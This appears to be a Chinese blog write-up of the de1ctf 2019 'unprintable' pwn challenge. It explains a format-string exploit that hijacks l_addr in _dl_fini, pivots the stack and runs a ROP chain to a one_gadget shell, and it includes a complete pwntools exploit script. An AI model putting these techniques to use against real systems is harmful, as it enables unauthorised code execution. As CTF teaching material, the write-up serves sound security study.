de1ctf_2019_unprintable(_dl_fini的l_addr劫持妙用)

最新推荐文章于 2022-04-19 20:45:05 发布
最新推荐文章于 2022-04-19 20:45:05 发布
阅读量1.5k 收藏 5
点赞数 4
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 格式化字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/106695358
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

de1ctf_2019_unprintable(_dl_fini的l_addr劫持妙用)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,存在一个非栈上的格式化字符串漏洞,但是关闭了文件描述符1,导致不能输出,并且printf结束后就调用了exit(0)

看看栈里有没有什么可用的数据

基本没有,要想劫持printf返回地址进而多次利用,是不行的,因为printf一次性不能实现,即不能修改栈中数据指向printf返回地址后继续利用新得到这个地址取修改printf返回地址,即其不具有传递性,其值依然是之前的值,因此必须分步。

在这里,我们发现一个有用的指针,该指针指向的地方正好就对应着dllinkmap->l_addr

exit会调用dl_fini函数,我们看看dl_fini函数的源码

本来l->l_addr为0,而l->l_info[DT_FINI_ARRAY]->d_un.d_ptr指针指向程序中的fini_array段的地址,也就是l->l_info[DT_FINI_ARRAY]->d_un.d_ptr的值为0x0000000000600DD8

现在,我们劫持l_addr,使得l->l_addr + l->l_info[DT_FINI_ARRAY]->d_un.d_ptr偏移到我们的buf里,这样,我们就能在buf里伪造fini_array,进而进行二次利用。

因此,第一次,我们的payload为

payload ='%'+str(0x298)+'c'+'%26$hn'

payload = payload.ljust(16,'\x00')+p64(0x00000000004007A3)

sh.sendline(payload)

这样做以后,l->addr变成了0x298,l->l_addr + l->l_info[DT_FINI_ARRAY]->d_un.d_ptr处就偏移到了我们buf里,而此处我们布下了地址0x00000000004007A3,于是0x00000000004007A3处会被执行。

当第二次回到printf的时候,栈里已经有许多成链的栈地址可以用了,并且,有一个直接指向了printf的返回地址,我们可以直接利用。

这样,我们就在buf里布置下rop,然后利用printf成链攻击劫持函数栈迁移返回到buf里执行rop。

其中有一个gadget,我们可以用来将bss段上的stdout指针改成one_gadget地址,然后在csu里面进行call即可。

.text:00000000004006E8 adc     [rbp+48h], edx

#coding:utf8
from pwn import *

libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
#pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
pop_rsp = 0x000000000040082d
csu_pop = 0x000000000040082A
csu_call = 0x0000000000400810
stderr_ptr_addr = 0x0000000000601040
one_gadget = 0xf1147
offset = one_gadget - libc.sym['_IO_2_1_stderr_']

'''.text:00000000004006E8 adc     [rbp+48h], edx
.text:00000000004006EB mov     ebp, esp
.text:00000000004006ED call    deregister_tm_clones
.text:00000000004006F2 pop     rbp
.text:00000000004006F3 mov     cs:completed_7594, 1
.text:00000000004006FA rep retn
'''
adc_p_rbp_edx = 0x00000000004006E8

sh = process('./de1ctf_2019_unprintable')
#sh = remote('node3.buuoj.cn',26685)
sh.recvuntil('This is your gift: ')
stack_addr = int(sh.recvuntil('\n',drop = True),16)
print 'stack_addr=',hex(stack_addr)

#第一步,更改ld.so里的offset,使得array函数数组偏移到bss段上的buf里,重新执行read、printf
#第一步的作用是在栈里留下了大量的栈指针
payload ='%'+str(0x298)+'c'+'%26$hn'
payload = payload.ljust(16,'\x00')+p64(0x00000000004007A3)
sh.sendline(payload)
sleep(0.5)
rop_addr = 0x0000000000601260
#利用gadget将stderr指针改为one_gadget指针
rop = p64(csu_pop)
tmp = stderr_ptr_addr-0x48
rop += p64(tmp-1) #rbx
rop += p64(tmp) #rbp
rop += p64(rop_addr + 0x8 * 6 - tmp * 8 + 0x10000000000000000) #r12
rop += p64(offset + 0x10000000000000000) #r13
rop += p64(adc_p_rbp_edx) #r14
rop += p64(0) #r15
rop += p64(csu_call)
#调用one_gadget
rop += p64(csu_pop)
rop += p64(0) #rbx
rop += p64(1) #rbp
rop += p64(stderr_ptr_addr) #r12
rop += p64(0) #r13
rop += p64(0) #r14
rop += p64(0) #r15
rop += p64(csu_call)


rop_addr = rop_addr - 0x18
#第二次,我们在buf里布下rop,同时劫持printf返回地址,进行下一轮利用
stdout_ptr_addr = 0x0000000000601020
payload = '%' + str(0xA3) + 'c%23$hhn'
payload = payload.ljust(0x200,'\x00')
payload += rop
sh.sendline(payload)
sleep(0.5)
#接下来我们在栈里布下rop_addr
for i in range(6):
   data = (stack_addr - 0x118 + i) & 0xFF
   if data < 0xA3:
      payload = '%' + str(data) + 'c%18$hhn%' + str(0xA3-data) + 'c%23$hhn'
   else:
      payload = '%' + str(data) + 'c%23$hhn%' + str(data-0xA3) + 'c%18$hhn'
   sh.sendline(payload)
   sleep(0.5)
   data = rop_addr & 0xFF
   if data == 0:
      payload = '%13$hhn%' + str(0xA3) + 'c%23$hhn'
   else:
      if data < 0xA3:
         payload = '%' + str(data) + 'c%13$hhn%' + str(0xA3-data) + 'c%23$hhn'
      else:
         payload = '%' + str(data) + 'c%23$hhn%' + str(data-0xA3) + 'c%13$hhn'
   rop_addr = rop_addr >> 0x8
   sh.sendline(payload)
   sleep(0.5)
sleep(0.5)
#接下来,劫持printf的返回地址为pop rsp,使得栈迁移到buf里执行rop
payload = '%' + str(pop_rsp & 0xFFFF) + 'c%23$hn'
sh.sendline(payload)

sh.interactive()

 

ha1vk
关注
专栏目录
de1ctf_2019_weapon (IO_FILE)
BengDouLove的博客
05-27 1046
这道题的方法对于我来说有点陌生,堆操作之后利用IO_FILE的相关知识,记录一下,以后还会有更多对于 IO 的利用 保护机制全开,所以常规方法肯定没办法 分析程序: 这是主程序 menu函数 create函数 逻辑是输入申请大小,在输入index,然后就写入chunk 没有任何检查,比如申请过的index不能用之类的 最简洁的申请函数 delete函数 同样是简洁的释放函数,而且有 uaf 漏洞 rename函数 改写chunk内容,写入的时候貌似没有溢出,但是 uaf 能用在这上面 程序看似
gdb用法(二) 在Linux下产生并调试core文件
w._.m
05-31 2430
分析核心(core)文件   在程序发生崩溃时,有时可能无法直接运行GDB来进行调试。比如程序可能是在另外一台机器上运行的,或者因为程序对时间比较敏感,所以手动跟踪调试会产生无法接受的延迟等。遇到这些情况,就只能等到程序运行结束后才能判断崩溃的原因了。这时需要用到Linux提供的core dump机制。当程序中出现内存操作错误时,会发生崩溃并产生核心文件。使用GDB可以对产生的核心文件进
buuctf [De1CTF 2019]SSRF Me
qq_52671379的博客
04-19 1034
buuctf [De1CTF 2019]SSRF Me
排查一个潜在的内存访问问题 -- 用 C 写代码的日常
weixin_34319374的博客
01-30 313
最近几个月,我开始涉足 C 开发的领域,遇到的最大的挑战在于如何管理好内存。从异常情况下避免内存泄漏,到排查代码逻辑里面的 invalid read,还有复用过程中没能清理好数据的问题,几乎各种坑都体验过一次。 举半个月前经历的一件事为例。跑单元测试的过程中,我发现 valgrind 报了个 invalid read 错误: ==3297...
GDB调试汇总
li4850729的专栏
11-01 3008
http://www.360doc.com/content/12/1101/21/11033862_245176417.shtml       初识GDB  GDB的出现减轻了开 发人员的负担,他们可以在程序运行的时候单步跟踪自己的代码,或者通过断点暂时中止程序的执行。此外,他们还能够随时察看变量和内存的当前状态,并监视关 键的数据结构是如何影响代码运行的。      调试
如何编写自己的缓冲区溢出利用程序(下)(转)
cizn2013的博客
05-31 267
如何编写自己的缓冲区溢出利用程序(下)(转)(续)by 黑猫(virtualcat@hotmai.com)值得注意的是: 如果象上面所说的, 我们输入的字串长度为二十个'A'--刚好复盖完0xbffff6b0所指的单元, 那么此...
从零开始学winpwn(3)--SEH
azraelxuemo的博客
02-11 993
文章目录什么是SEHSEH相关数据结构EXCEPTION_REGISTRATION _RECORD结构异常处理调用栈SEH默认保护攻击如果payload写在栈上会怎么样? 什么是SEH 在没有调试器参与的情况下,系统主要依靠SEH机制(用户态,内核态都可用)和VEH机制(仅支持用户模式)进行异常处理 SEH(Structed Exception Handling 结构化异常处理)是windows操作系统用于自身除错的一种机制,也是开发人员处理程序错误或异常的武器,它告诉系统当程序运行出现异常或错误由谁处理。
My_First_HPS.rar_DE1 SOC_SOC_de1 hps_de1-soc_my_first_hps
09-21
标题 "My_First_HPS.rar_DE1 SOC_SOC_de1 hps_de1-soc_my_first_hps" 暗示了这是一个关于DE1-SOC开发板上实现的"My First HPS"项目,其中HPS代表Hard Processor System(硬处理器系统)。这个项目可能是针对初学者...
DE1_i2sound.rar_ALTERA DE1_DE1 音乐_de1_de1_i2sound
09-23
DE1_i2sound.rar 是一个针对Altera DE1开发板的资源包,主要目标是实现通过DE1平台播放音乐的功能。这个压缩包包含了与DE1开发板上的I2S(Inter-IC Sound)接口相关的软件、硬件设计以及可能的教程资料,帮助用户...
DE1_SoC.zip_DE1_SoC_assignment_de1-soc_verilog
最新发布
09-24
DE1_SoC.zip_DE1_SoC_assignment_de1-soc_verilog是一个关于DE1_SoC开发板的Verilog引脚分配项目的压缩文件。这个项目主要涉及的是在硬件描述语言Verilog中对DE1_SoC开发板的引脚进行适当地配置和分配。DE1_SoC是一...
DE1_SD_Card_Audio.zip_DE1_SD_CARD_Audio_SD_de1_sd card_sopc
07-15
DE1 Sopc SD card audio
_dl_start_user源码分析(一)
conansonic的博客
07-24 3072
_dl_start_user源码分析 _start
exit_hook劫持
starssgo的博客
04-13 4833
更改exit()某一结构体,再调用exit()可以实现程序流程的劫持。 原理分析 首先查看exit()源代码,我的libc=2.27 调用__run_exit_handlers函数,查看源代码, exit.c 77行。 while (cur->idx > 0) { struct exit_function *const f = &cur->fns[-...
dlopen dlsym dlerror 动态连接库相关
小小世界的专栏
07-10 1780
Linux提供了一套API来动态装载库。下面列出了这些API: - dlopen,打开一个库,并为使用该库做些准备。 - dlsym,在打开的库中查找符号的值。 - dlclose,关闭库。 - dlerror,返回一个描述最后一次调用dlopen、dlsym,或dlclose的错误信息的字符串。 C语言用户需要包含头文件dlfcn.h才能使用上述API。glibc还增加了两个P
绕过libsafe的保护--覆盖_dl_lookup_versioned_symbol技术
工作记录--创造或收集原创
01-12 1981
转载自:http://zjss.shayit.com/?news&t=7925&forum=24   在这里向您展现一下新的覆盖_dl_lookup_versioned_symbol技术 (这技术我提的,就这么命名好了:) ) 错误之处,还请来信斧正,谢谢。 上接> 由于libsafe只保护堆栈区,不保护heap,和bss区,所以,我们可以设法覆盖那里的某些重要变量,从而使我
Linux下的程序调试——GDB
szu030606的专栏
02-02 3392
无论是多么优秀的程序员,都难以保证自己在编写代码时不会出现任何错误,因此调试是软件开发过程中的一个必不可少的 组成部分。当程序完成编译之后,它很可能无法正常运行,或者会彻底崩溃,或者不能实现预期的功能。此时如何通过调试找到问题的症结所在,就变成了摆在开发 人员面前最严峻的问题。通常说来,软件项目的规模越大,调试起来就会越困难,越需要一个强大而高效的调试器作为后盾。对于Linux程序员来讲,目前可供
linux fopen 段错误,fopen出现段错误,不解[已解决]
weixin_34277051的博客
05-13 708
fopen出现段错误,不解[已解决](2012-04-10 04:10:26)标签:杂谈fopen出现段错误,不解[已解决]本来在Gentoo下编的一个C库,通过swig提供一个python接口今天把程序拷贝到openSUSE下,编译通过,运行出错,attach上gdb看了下,是fopen出段错误目前完全找不到北,大家指点下===============================我是分割线=...
DE1_SoC FPGA设计入门教程
文档详细介绍了SoCFPGA的设计和DE1_SoC开发板的使用。 在SoCFPGA(System on Chip - Field Programmable Gate Array)设计中,整合了处理器系统和可编程逻辑,提供了高度集成的解决方案。DE1_SoC开发板是Terasic...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值